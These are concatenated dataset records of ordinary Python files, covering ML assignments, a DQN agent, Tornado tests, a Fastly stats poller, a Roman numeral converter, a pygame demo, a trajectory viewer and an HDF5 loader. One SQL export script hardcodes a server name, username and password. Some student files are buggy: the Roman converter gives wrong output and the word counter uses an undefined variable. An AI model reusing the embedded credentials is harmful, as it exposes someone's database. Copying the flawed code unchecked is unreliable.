xtest, \n ytest, \n ypred_kdtree)\n\nkdtree_accuracy = (test_c0_kdt.shape[0] + test_c1_kdt.shape[0])/(ytest.shape[0])\n\nplot_results(train_c0_kdt, train_c1_kdt, test_c0_kdt, test_c1_kdt, test_ic0_kdt, test_ic1_kdt,'kdtree_classifier.pdf')\n\n#%%\nprint('Linear classifier accuracy = ', round(lin_accuracy*100,2), '%')\nprint('kD tree classifier accuracy = ', round(kdtree_accuracy*100,2), '%')","sub_path":"CS5783_ML/Assignment 1/problem_2_3_4.py","file_name":"problem_2_3_4.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"168169848","text":"\"\"\"Program that outputs one of at least four random, good fortunes.\"\"\"\n\n__author__ = \"730475029\" \nfrom random import randint\nprint(\"Your fortune cookie says...\")\nx: int = (randint(1, 4))\nif x == 1:\n print(\"You will be very successful.\")\nelse:\n if x == 2:\n print(\"Your business endeavors will prosper.\")\n else:\n if x == 3:\n print(\"You will live a happy life.\")\n else:\n\n if x == 4:\n print(\"You will make a lot of money.\")\nprint(\"Now, go spread positive vibes!\")","sub_path":"exercises/ex02/fortune_cookie.py","file_name":"fortune_cookie.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"418819298","text":"import gym\nimport tensorflow as tf\nimport numpy as np\nimport random\nfrom collections import deque\n\nENV_NAME = 'CartPole-v0'\nEPISODE = 10000\nSTEP = 300\n\n# Hyper Parameters for DQN\nGAMMA = 0.9 # discount factor for target Q\nINITIAL_EPSILON = 0.5 # starting value of epsilon\nFINAL_EPSILON = 0.01 # final value of epsilon\nREPLAY_SIZE = 10000 # experience replay buffer size\nBATCH_SIZE = 32 # size of minibatch\n\n\nclass DQN(object):\n def __init__(self, env):\n self.replay_buffer = deque()\n\n self.time_step = 0\n self.epsilon = INITIAL_EPSILON\n self.state_dim = env.observation_space.shape[0]\n self.action_dim = env.action_space.n\n\n self._create_network()\n self._create_training_method()\n\n self.sess = tf.InteractiveSession()\n self.sess.run(tf.global_variables_initializer())\n\n def _create_network(self):\n w1 = tf.get_variable('w1', shape=[self.state_dim, 20]) # 20表示MLP的隐藏层单元数\n b1 = tf.get_variable('b1', [20])\n\n w2 = tf.get_variable('w2',[20, self.action_dim])\n b2 = tf.get_variable('b2',[self.action_dim])\n\n self.state_input = tf.placeholder(tf.float32, [None, self.state_dim])\n net = tf.nn.relu(tf.matmul(self.state_input, w1) + b1)\n self.q_value = tf.matmul(net, w2) + b2\n\n def _create_training_method(self):\n # FIXME: action 是一种01吗?\n self.action_input = tf.placeholder(tf.float32, [None, self.action_dim]) # one hot presentation\n self.y_input = tf.placeholder(tf.float32, [None]) # TODO? y???\n\n q_action = tf.reduce_sum(tf.multiply(self.q_value, self.action_input))\n self.loss = tf.reduce_mean(tf.square(self.y_input - q_action))\n\n self.opt = tf.train.AdadeltaOptimizer(1e-5).minimize(self.loss)\n\n def perceive(self, state, action, reward, next_state, done):\n one_hot_action = np.zeros(self.action_dim)\n one_hot_action[action] = 1\n self.replay_buffer.append((state, one_hot_action, reward, next_state, done))\n if len(self.replay_buffer) > REPLAY_SIZE:\n self.replay_buffer.popleft()\n\n if len(self.replay_buffer) > BATCH_SIZE:\n self._train_net()\n\n def _train_net(self):\n self.time_step += 1\n # step 1: obtain random minibatch from replay memory\n minibatch = random.sample(self.replay_buffer, BATCH_SIZE)\n state_batch = [data[0] for data in minibatch]\n action_batch = [data[1] for data in minibatch]\n reward_batch = [data[2] for data in minibatch]\n next_state_batch = [data[3] for data in minibatch]\n done_batch = [data[4] for data in minibatch]\n\n # step 2: calculate y\n y_batch = []\n q_value_batch = self.q_value.eval(feed_dict={self.state_input: next_state_batch}) # TODO: 为什么输入的是nextState?\n for i in range(BATCH_SIZE):\n done = done_batch[i]\n if done:\n y_batch.append(reward_batch[i])\n else:\n y_batch.append(reward_batch[i] + GAMMA * np.max(q_value_batch[i]))\n\n self.opt.run(feed_dict={\n self.y_input: y_batch, self.action_input: action_batch, self.state_input: state_batch})\n\n def egreedy_action(self, state):\n # for training\n q_value = self.q_value.eval(feed_dict={self.state_input: [state]})[0] # FIXME: 为什么state要加[]? 为什么要加0?\n if random.random() < self.epsilon:\n return random.randint(0, self.action_dim - 1)\n else:\n return np.argmax(q_value)\n\n def action(self, state):\n # for testing\n return np.argmax(self.q_value.eval(feed_dict={\n self.state_input: [state]\n })[0])\n\n\ndef main():\n env = gym.make(ENV_NAME)\n agent = DQN(env)\n\n for episode in range(EPISODE):\n state = env.reset()\n for step in range(STEP):\n action = agent.egreedy_action(state)\n next_state, reward, done, _ = env.step(action)\n\n reward_agent = -1 if done else 0.1 # TODO: ???\n agent.perceive(state, action, reward, next_state, done) # TODO ??\n state = next_state\n if done:\n break\n\nif __name__ == '__main__':\n main()","sub_path":"cartpole/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"641277301","text":"#!/usr/bin/env python\n\nimport sys\nimport logging\nimport time\nimport os\n\nfrom mock import MagicMock\n\nfrom tornado.ioloop import IOLoop\nfrom tornado.testing import AsyncHTTPTestCase\nfrom tornado.web import Application\n\nfrom app.lib.mock import set_mock_data\nfrom app.lib.route import get_routes\nfrom app.config import config\n\n\nlog = logging.getLogger(__name__)\n\n\nclass BaseTest(AsyncHTTPTestCase):\n \"\"\" Base class for all functional tests \"\"\"\n\n def wait_until_active(self, t=30):\n if 'mock_data' in config:\n return\n else:\n time.sleep(t)\n\n def setUp(self):\n super(BaseTest, self).setUp()\n self.test_token = \"{0}\".format(config['test_token'])\n\n def get_method(self, url):\n return self.fetch(\n url,\n method=\"GET\",\n headers={\n \"Content-Type\": \"application/json\",\n \"X-Auth-Token\": self.test_token\n }\n )\n\n def fetch(self, path, **kwargs):\n response = AsyncHTTPTestCase.fetch(self, path, **kwargs)\n if response.body is not None:\n response.value = response.body.decode('utf-8')\n return response\n\n def get_app(self):\n # setup the application\n log.info(\"Starting the application\")\n routes = get_routes(os.path.dirname(__file__), \"app\")\n\n app = Application(routes)\n\n return app\n\n @classmethod\n def setUpClass(cls):\n # call the superclass version of this\n super(BaseTest, cls).setUpClass()\n config.load_file('ops/config.yaml')\n if(\"-m\" in sys.argv or \"--mock\" in sys.argv):\n set_mock_data()\n\n\nclass AsyncMagicMock(MagicMock):\n \"\"\" This is for using MagicMock with gen.Task in Tornado \"\"\"\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Handle this MagicMock as a normal MagicMock unless an Async\n (gen.Task) calls it asking for a callback to happen\n \"\"\"\n # Call the super class and get the results, pickup after this\n # pylint: disable=E1003\n results = super(MagicMock, self).__call__(*args, **kwargs)\n\n # gen.Task call\n if \"callback\" in kwargs:\n kwargs[\"callback\"](results)\n # Standard call\n else:\n return results\n","sub_path":"test/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"569333309","text":"\"\"\"\nfastly_slurper.slurper\n~~~~~~~~~~~~~~~~~~~~~~\n\n:copyright: (c) 2015 Disqus, Inc.\n:license: Apache, see LICENSE for more details.\n\"\"\"\nimport sys\nimport threading\nfrom time import time, sleep\nfrom datetime import datetime\nfrom os.path import join\n\nimport requests\nfrom pystatsd import Client as StatsdClient\n\n\nclass Statsd(StatsdClient):\n def __init__(self, address=('localhost', 8125), prefix=None, verbose=True):\n self.verbose = verbose\n super(Statsd, self).__init__(address[0], address[1], prefix)\n\n def timing(self, stat, time):\n self._log('timing', stat, time)\n super(Statsd, self).timing(stat, time)\n\n def gauge(self, stat, time):\n self._log('gauge', stat, time)\n super(Statsd, self).gauge(stat, time)\n\n def _log(self, type, stat, value):\n if self.verbose:\n sys.stderr.write(\n '{now} [{type}] {stat} {value}\\n'.format(\n now=datetime.now(), type=type,\n stat=stat if self.prefix is None else '.'.join((self.prefix, stat)),\n value=value,\n )\n )\n\n\nclass Fastly(requests.Session):\n base = 'https://rt.fastly.com/'\n user_agent = 'fastly-slurper/1.0'\n\n def __init__(self, api_key):\n super(Fastly, self).__init__()\n\n self.headers.update({\n 'Fastly-Key': api_key,\n 'User-Agent': self.user_agent,\n })\n\n def request(self, method, url, **kwargs):\n return super(Fastly, self).request(method=method, url=self.base+url, **kwargs)\n\n\nclass RecorderWorker(threading.Thread):\n def __init__(self, client, publisher, service, delay=1.0):\n super(RecorderWorker, self).__init__()\n self.daemon = True\n\n self.client = client\n self.publisher = publisher\n self.name, self.channel = service\n self.delay = delay\n\n def timing(self, stat, time):\n self.publisher.timing(self.name + '.' + stat, time)\n\n def gauge(self, stat, time):\n self.publisher.gauge(self.name + '.' + stat, time)\n\n def url_for_timestamp(self, ts):\n # Convert timestamp to str and remove the decimal\n strts = ('%.9f' % ts).translate(None, '.')\n return join('channel', self.channel, 'ts', strts)\n\n def get_stats(self, ts):\n response = self.client.get(self.url_for_timestamp(ts)).json()\n return response['Data']\n\n def record_stats(self, message):\n for stats in message:\n if 'datacenter' in stats:\n for dc, dcstats in stats['datacenter'].iteritems():\n for stat, val in dcstats.iteritems():\n if stat == 'miss_histogram':\n continue\n\n if stat.endswith('_time'):\n t = stat.split('_')[0]\n if dcstats[t]:\n val = val / dcstats[t] * 1000\n\n stat_name = '%s.%s' % (dc, stat)\n self.timing(stat_name, val)\n\n self.gauge('last_record', int(time()))\n\n def run(self):\n while True:\n try:\n self.record_stats(self.get_stats(time()))\n except Exception:\n import traceback\n traceback.print_exc(file=sys.stderr)\n sleep(self.delay)\n","sub_path":"fastly_slurper/slurper.py","file_name":"slurper.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"646042508","text":"import numpy as np\n\nclass MNPrior:\n\tdef __init__(self, data, AR, lags, params=[0.2,0.5,2.0,1e5]):\n\t\tself.T, self.n_vars = data.shape\n\t\tself.AR = AR\n\t\tself.hparam1 = params[0]\n\t\tself.hparam2 = params[1]\n\t\tself.hparam3 = params[2]\n\t\tself.hparam4 = params[3]\n\n\t\tself.compute(data, lags)\n\n\tdef compute(self, data, lags):\n\t\tif self.AR:\n\t\t\trho = np.asarray(self.AR)\n\t\telse:\n\t\t\trho = np.ones(self.n_vars, order='F')\n\n\t\tse = np.zeros(self.n_vars, order='F')\n\n\t\t# Estimate error variances from OLS residuals\n\t\tfor ivar in range(self.n_vars):\n\t\t\ty = data[1:self.T,ivar]\n\t\t\tx_noconst = data[0:self.T-1,ivar].reshape((-1,1), order='F')\n\t\t\tconst = np.ones((self.T-1,1), order='F')\n\t\t\tx = np.concatenate((const,x_noconst), axis=1)\n\t\t\tb = np.linalg.lstsq(x, y, rcond=None)[0]\n\t\t\tu = y - np.matmul(x, b)\n\t\t\tse[ivar] = np.sqrt(u.dot(u) / (y.shape[0]-2))\n\n\t\t# Set coefficient means\n\t\tself.coeff_mean = np.zeros((lags,self.n_vars,self.n_vars), order='F')\n\t\tlag = 1\n\t\tfor ivar in range(self.n_vars):\n\t\t\tself.coeff_mean[lag-1,ivar,ivar] = rho[ivar]\n\n\t\t# Set coefficient variances\n\t\tself.coeff_var = np.zeros((lags,self.n_vars,self.n_vars), order='F')\n\t\tfor lag in range(1, lags+1):\n\t\t\tfor ivar in range(self.n_vars):\n\t\t\t\tfor jvar in range(self.n_vars):\n\t\t\t\t\tif ivar == jvar:\n\t\t\t\t\t\ttmp = self.hparam1 / (lag ** self.hparam3)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmp_denom = se[jvar] * lag ** self.hparam3\n\t\t\t\t\t\ttmp_num = se[ivar] * self.hparam1 * self.hparam2\n\t\t\t\t\t\ttmp = tmp_num / tmp_denom\n\t\t\t\t\tself.coeff_var[lag-1,ivar,jvar] = tmp * tmp\n\n\t\t# Set constant variances\n\t\tself.const_var = np.zeros(self.n_vars, order='F')\n\t\tfor ivar in range(self.n_vars):\n\t\t\ttmp = se[ivar] * self.hparam4\n\t\t\tself.const_var[ivar] = tmp * tmp\n\n\t\t# Create matrix of all means\n\t\tself.means = np.zeros((lags*self.n_vars+1, self.n_vars), order='F')\n\t\ttmp = np.transpose(self.coeff_mean, (2,0,1))\n\t\ttmp = np.reshape(tmp, (lags*self.n_vars, self.n_vars), order='F')\n\t\tself.means[:-1,:] = tmp\n\t\tself.means = self.means.reshape((-1,1), order='F')\n\t\t\n\t\t# Create matrix of all variances\n\t\tself.variances = np.zeros((lags*self.n_vars+1, self.n_vars), order='F')\n\t\ttmp = np.transpose(self.coeff_var, (2,0,1))\n\t\ttmp = np.reshape(tmp, (lags*self.n_vars, self.n_vars), order='F')\n\t\tself.variances[:-1,:] = tmp\n\t\tself.variances[-1,:] = self.const_var\n\t\tself.variances = np.diagflat(self.variances.reshape((-1,1), order='F'))\n\n\n\t\t# WHAT IS THIS???\n\t\tself.gamma = np.eye(self.n_vars, order='F')\n\n\t\tn_stacked = self.n_vars * (self.n_vars * lags + 1)\n\t\ttmp = np.eye(n_stacked, order='F')\n\n\t\tself.inv_variances = np.linalg.lstsq(self.variances, tmp, rcond=None)[0]\n\t\t# self.coeff_var_inv = np.linalg.inv(self.coeff_var)\n","sub_path":"code/MNPrior.py","file_name":"MNPrior.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"183142105","text":"#encoding: UTF-8\n#Autor: Jesús Perea\n#Números Romanos \n\n#empieza\n\ndef convertirARomano(numero): #Convierte el número dado en número romano\n if numero >= 1 and numero <= 10:\n if numero >= 1 and numero <=2:\n if numero == 1:\n romano = \"I\" \n else:\n romano = \"II\"\n if numero >= 3 and numero <= 4:\n if numero == 3:\n romano = \"III\"\n else:\n romano = \"IV\"\n if numero >= 5 and numero <=8:\n if numero == 5:\n romano = \"V\"\n else:\n romano = \"VI\" \n if numero >= 7 and numero <= 8:\n if numero == 7:\n romano = \"VII\" \n else:\n romano = \"VII\"\n if numero >= 9 and numero <=10:\n if numero == 9:\n romano = \"IX\"\n else:\n romano = \"X\"\n return romano\n else: \n error = \"Error. Teclea un número válido\"\n return error\n \ndef main(): \n numeroEntero = int(input(\"Teclea el número ente el 1 y 10 que quieras convertir en romano\"))\n numeroRomano = convertirARomano(numeroEntero)\n print (numeroRomano) \n\n\nmain()","sub_path":"Numero_Romano.py","file_name":"Numero_Romano.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"448832791","text":"__author__ = 'as117001364'\nimport pygame\nfrom pygame.locals import *\n\npygame.init()\npygame.display.set_caption(\"Space Shooter\")\nscreen = pygame.display.set_mode((800, 600))\npygame.mouse.set_visible(0)\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('resources/hotshotgg.png')\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.dx = 0\n self.dy = 0\n\n def moveX(self, vel):\n self.dx = vel\n\n def moveY(self, vel):\n self.dy = vel\n\n def update(self):\n self.x += self.dx\n self.y += self.dy\n\n self.rect.x = self.x\n self.rect.y = self.y\n\n\n\ndef main():\n global player\n player = Player(50, 50)\n\n playerSprite = pygame.sprite.RenderPlain()\n playerSprite.add(player)\n\n #Set Clock\n clock = pygame.time.Clock()\n keepGoing = True\n counter = 0\n\n #Main Loop\n while keepGoing:\n clock.tick(30)\n #input\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n keepGoing = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n player.moveX(-2)\n elif event.key == pygame.K_RIGHT:\n player.moveX(2)\n elif event.key == pygame.K_UP:\n player.moveY(-2)\n elif event.key == pygame.K_DOWN:\n player.moveY(2)\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n player.moveX(0)\n elif event.key == pygame.K_RIGHT:\n player.moveX(0)\n elif event.key == pygame.K_UP:\n player.moveY(0)\n elif event.key == pygame.K_DOWN:\n player.moveY(0)\n screen.fill((255,255,255))\n playerSprite.update()\n playerSprite.draw(screen)\n pygame.display.update()\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"217493414","text":"import pymssql\n\n\"\"\"Instructions: In a new python script write the following at the top:\n\nfrom query import *\n\nAnd the use the execute_to_csv function like you normally do.\n\"\"\"\n\ndef execute_to_csv(query, filename):\n con = pymssql.connect(server='thales-mathsys1.database.windows.net', user='ayman-admin@thales-mathsys1', password='fb1123581321&', database='thales')\n with con:\n cur = con.cursor()\n cur.execute(query)\n row = cur.fetchone()\n with open(filename, 'w') as f:\n f.write(\"link_id, link_type, link_length, link_direction, link_location, from_node, to_node, from_lat, from_lon, to_lat, to_lon\\n\")\n while row:\n row = [str(r) for r in row]\n entry = \", \".join(row)+\"\\n\"\n f.write(entry)\n row = cur.fetchone()\n\ndef main():\n qry = \"SELECT L.*, NF.node_lat AS from_lat, NF.node_lon AS from_lon, NT.node_lat AS to_lat, NT.node_lon AS to_lon FROM\"\n qry = qry + \" (SELECT * FROM links WHERE link_id IN (SELECT DISTINCT link_id FROM m11_travel_time)) AS L \"\n qry = qry + \" LEFT JOIN (SELECT * FROM nodes) AS NF\"\n qry = qry + \" ON L.from_node = NF.node_id\"\n qry = qry + \" LEFT JOIN (SELECT * FROM nodes) AS NT\"\n qry = qry + \" ON L.to_node = NT.node_id\"\n execute_to_csv(qry, \"m11_links.csv\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"00_Data/00_Data_acquisition(HE_cloud_SQL_CSV)/F. Creating queries to download CSV files/QUERY_PRINT_LINKS.py","file_name":"QUERY_PRINT_LINKS.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357422900","text":"import numpy as np\nfrom skimage.measure import label\n\nfrom .itertools import negate_indices\nfrom .axes import AxesLike, check_axes\n\nfrom .shape_ops import *\n\n\n# TODO: docstring\ndef normalize(x: np.ndarray, mean: bool = True, std: bool = True, percentiles: AxesLike = None,\n axes: AxesLike = None) -> np.ndarray:\n \"\"\"\n Normalize ``x``'s values to make mean and std independently along ``axes`` equal to 0 and 1 respectively\n (if specified).\n \"\"\"\n if axes is not None:\n axes = tuple(negate_indices(check_axes(axes), x.ndim))\n\n robust_values = x\n if percentiles is not None:\n if np.size(percentiles) == 1:\n percentiles = [percentiles, 100 - percentiles]\n\n bottom, top = np.percentile(x, percentiles, axes, keepdims=True)\n mask = (x < bottom) | (x >= top)\n robust_values = np.ma.masked_array(x, mask=mask)\n\n if mean:\n x = x - robust_values.mean(axes, keepdims=True)\n if std:\n x = x / robust_values.std(axes, keepdims=True)\n\n return x\n\n\ndef min_max_scale(x: np.ndarray, axes: AxesLike = None) -> np.ndarray:\n \"\"\"Scale ``x``'s values so that its minimum and maximum become 0 and 1 respectively\n independently along ``axes``.\"\"\"\n if axes is not None:\n axes = tuple(negate_indices(check_axes(axes), x.ndim))\n\n x_min, x_max = x.min(axis=axes, keepdims=True), x.max(axis=axes, keepdims=True)\n return (x - x_min) / (x_max - x_min)\n\n\ndef bytescale(x: np.ndarray) -> np.ndarray:\n \"\"\"\n Scales ``x``'s values so that its minimum and maximum become 0 and 255 respectively.\n Afterwards converts it to ``uint8``.\n \"\"\"\n return np.uint8(np.round(255 * min_max_scale(x)))\n\n\ndef describe_connected_components(mask: np.ndarray, background: int = 0, drop_background: bool = True):\n \"\"\"\n Get the connected components of ``mask`` as well as their labels and volumes.\n\n Parameters\n ----------\n mask\n background\n the label of the background. The pixels with this label will be marked as the background component\n (even if it is not connected).\n drop_background:\n whether to exclude the background from the returned components' descriptions.\n\n Returns\n -------\n labeled_mask\n array of the same shape as ``mask``.\n labels\n a list of labels from the ``labeled_mask``. The background label is always 0.\n The labels are sorted according to their corresponding volumes.\n volumes\n a list of corresponding labels' volumes.\n \"\"\"\n label_map = label(mask, background=background)\n labels, volumes = np.unique(label_map, return_counts=True)\n idx = volumes.argsort()[::-1]\n labels, volumes = labels[idx], volumes[idx]\n if drop_background:\n foreground = labels != 0\n labels, volumes = labels[foreground], volumes[foreground]\n return label_map, labels, volumes\n\n\ndef get_greatest_component(mask: np.ndarray, background: int = 0, drop_background: bool = True) -> np.ndarray:\n \"\"\"Get the greatest connected component from ``mask``. See `describe_connected_components` for details.\"\"\"\n label_map, labels, volumes = describe_connected_components(mask, background, drop_background)\n return label_map == labels[0]\n\n\n# 27.07.2019\n@np.deprecate(new_name='normalize')\ndef normalize_image(image: np.ndarray, mean: bool = True, std: bool = True, drop_percentile: int = None) -> np.ndarray:\n return normalize(image, mean, std, drop_percentile)\n\n\n@np.deprecate(new_name='normalize')\ndef normalize_multichannel_image(image: np.ndarray, mean: bool = True, std: bool = True, drop_percentile: int = None):\n return normalize(image, mean, std, drop_percentile, 0)\n","sub_path":"dpipe/medim/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"547333493","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('create/', views.create_teacher, name=\"create-teacher\"),\n path('list/', views.teacher_list, name=\"teacher-list\"),\n\t\n path('edit/<int:teacher_id>', views.edit_teacher, name=\"edit-teacher\"),\n\t\n path('delete/<int:teacher_id>', views.delete_teacher, name=\"delete-teacher\"),\n path('post-list/', views.post_list, name='post-list'),\n path('search/', views.search_teacher, name=\"search-teacher\"),\n\n]\n","sub_path":"Online Result/teacher/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"394721648","text":"#!/usr/bin/python3\n\n# Prints unique entries of messages matching the target code\nimport sys\nimport os\nimport glob\nimport argparse\n\n# Global binary locations\nbinDir = \"../bin/\"\nlogDir = \"../logs/\"\n\n# Setup argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-s\",\"--sort\",action=\"store_true\",help=\"Flag to enable sorting of output.\")\nparser.add_argument(\"target_code\",nargs='?',default=None,help=\"Used to restrict output to that of a certain message code.\")\nargs = parser.parse_args()\n\n# Get mosts recent log file\n# Get all .log files in logDir\nlist_of_files = glob.glob(logDir + \"*.log\")\n# Get the latest file\nlatest_file = max(list_of_files, key=os.path.getctime)\n# Open and read contents of the latest log file\nfS = open(latest_file)\ndata = fS.read().strip().split(\"\\n\")\nfS.close()\n\n# Contains the unique entries\ncodes = []\n# Flagged True by lack of a <CODE>\nshowAll = False\n\n# Get the code we are looking for\nif args.target_code == None:\n\tshowAll = True\nelse:\n\ttarget = args.target_code\n\n\nfor i in data:\n\tif showAll or (i.lstrip().split(\" \")[1] == target):\n\t\tif i.lstrip().strip() not in codes:\n\t\t\tcodes.append(i.lstrip().strip())\n\n# Sort codes if neccesary\nif args.sort:\n\tcodes.sort()\n# Output\nprint(\"\\n\".join(codes))\n","sub_path":"analysis/log_extraction/list_unique.py","file_name":"list_unique.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"312875239","text":"import requests\nimport string\npunc = string.punctuation\nbook = requests.get('http://www.gutenberg.org/files/42108/42108-0.txt')\nbook = book.text\nfor x in book:\n if x in punc:\n book = book.replace(x,'')\nbook = book.lower()\nbook = book.split(' ')\nword_count = {}\n\n\n\nfor word in book:\n if prev_word and word:\n if word not in word_count:\n word_count[word] = 0\n word_count[word] += 1\n\nwords = list(word_count.items()) # .items() returns a list of tuples\nwords.sort(key=lambda tup: tup[1], reverse=True) # sort largest to smallest, based on count\n\nfor i in range(min(10, len(words))): # print the top 10 words, or all of them, whichever is smaller\n print(words[i])","sub_path":"Students/Sean/python/Lab15_optionals.py","file_name":"Lab15_optionals.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"348087487","text":"import sys\nfrom pycontrol import conf\nsys.path.append(conf.pangolin_build_src)\n\nimport pypangolin as pango\nfrom pycontrol import mat\nfrom OpenGL.GL import *\nimport numpy as np\nimport time\n\n\ngroundtruth_file = './data/groundtruth.txt'\nestimated_file = './data/estimated.txt'\nposes = []\n\n\ndef DrawTrajectory(groundtruth, estimated):\n pango.CreateWindowAndBind(\"trajectory viewer\", 1024, 768)\n glEnable(GL_DEPTH_TEST)\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n pm = pango.ProjectionMatrix(1024, 768, 500, 500, 512, 389, 0.1, 1000)\n mv = pango.ModelViewLookAt(0, -0.1, -1.8, 0, 0, 0, 0.0, -1.0, 0.0)\n s_cam = pango.OpenGlRenderState(pm, mv)\n\n handler = pango.Handler3D(s_cam)\n d_cam = pango.CreateDisplay()\n d_cam.SetBounds(pango.Attach(0.0), pango.Attach(1.0),\n pango.Attach(0.0), pango.Attach(1.0),\n -1024/768)\n d_cam.SetHandler(handler)\n\n while not pango.ShouldQuit():\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n d_cam.Activate(s_cam)\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glLineWidth(2)\n\n for i in range(len(groundtruth)-1):\n glColor3f(0.0, 1.0, 0.0)\n glBegin(GL_LINES)\n\n SE3_p1 = groundtruth[i]\n SE3_p2 = groundtruth[i+1]\n glVertex3d(SE3_p1[0], SE3_p1[1], SE3_p1[2])\n glVertex3d(SE3_p2[0], SE3_p2[1], SE3_p2[2])\n glEnd()\n\n for i in range(len(estimated)-1):\n glColor3f(1.0, 0.0, 0.0)\n glBegin(GL_LINES)\n\n SE3_p1 = estimated[i]\n SE3_p2 = estimated[i + 1]\n glVertex3d(SE3_p1[0], SE3_p1[1], SE3_p1[2])\n glVertex3d(SE3_p2[0], SE3_p2[1], SE3_p2[2])\n glEnd()\n\n pango.FinishFrame()\n time.sleep(0.005)\n\n\n\ndef read_file(filename):\n trajectory = []\n with open(filename, 'r') as f:\n for l in f.readlines():\n l = l.split()\n _time = l[0]\n tx, ty, tz, qx, qy, qz, qw = map(float, l[1:])\n q = np.array([qw, qx, qy, qz])\n t = np.array([tx, ty, tz])\n SE3 = mat.SE3_qt(q, t)\n trajectory.append(SE3)\n\n return np.array(trajectory)\n\n\n\nif __name__ == '__main__':\n groundtruth = read_file(groundtruth_file)\n estimated = read_file(estimated_file)\n assert(len(groundtruth)!=0 and len(estimated)!=0)\n assert(len(groundtruth) == len(estimated))\n\n rmse = 0\n for i in range(len(estimated)):\n SE3_p1 = estimated[i]\n SE3_p2 = groundtruth[i]\n\n p2_inv = mat.SE3_inverse(SE3_p2)\n temp1 = mat.SE3_mul_SE3(p2_inv, SE3_p1)\n temp2 = mat.SE3_log(temp1)\n error = np.sqrt(np.sum(np.power(temp2, 2)))\n rmse += error ** 2\n\n rmse = rmse / len(estimated)\n rmse = np.sqrt(rmse)\n\n print(\"RMSE = \", rmse)\n\n DrawTrajectory(groundtruth, estimated)\n","sub_path":"docs/matrix/trajectoryError.py","file_name":"trajectoryError.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"324246785","text":"import random\nimport numpy as np\nimport os\nimport torch\n\nfrom .train import Actor\n\nSEED = 65537\nDEVICE = torch.device(\"cpu\")\ntorch.manual_seed(SEED)\n\n\nclass Agent:\n def __init__(self):\n self.model = Actor(26, 6)\n self.model.load_state_dict(torch.load(__file__[:-8] + \"/agent.pt\", map_location=DEVICE))\n self.model = self.model.to(DEVICE)\n self.model.eval()\n\n def act(self, state):\n with torch.no_grad():\n state = torch.unsqueeze(torch.tensor(np.array(state)).float(), 0).to(DEVICE)\n action, _, _ = self.model.act(state)\n return action[0].numpy()\n\n def reset(self):\n pass\n","sub_path":"src/hw3/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"317879611","text":"#!/usr/bin/env python3\n\nN, A, B, C, D = map(int, input().split())\nS = input()\n\n#hunuke\n\nh = S[A-1:D+1].count('##')\nm3 = S[B-2:D+1].count('...')\n\nif C < D:\n if h == 0: print('Yes')\n else: print('No')\nelse:\n if m3 != 0 and h == 0:\n print('Yes')\n else: print('No')\n \n","sub_path":"Cer0un0/agc034/a/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"626096779","text":"from __future__ import absolute_import\nfrom .six import string_types\n\ndef load_hdf5(filename_or_buffer, autoconvert=True, restype=None, top=None):\n \"\"\"\"load hd5f format from openmm (?)\n\n Parameters\n ---------\n filename_or_buffer : str or buffer\n autoconvert : bool\n if 'True' (default): convert from `nm` to `angstrom`\n if 'False': No convert\n\n Examples\n -------\n from mdtraj.testing import get_fn\n fname = get_fn(\"frame0.h5\")\n import pytraj.io as io\n traj = io.load_hdf5(fname, autoconvert=False)\n print (traj)\n \"\"\"\n\n try:\n import h5py\n except ImportError:\n raise ImportError(\"require 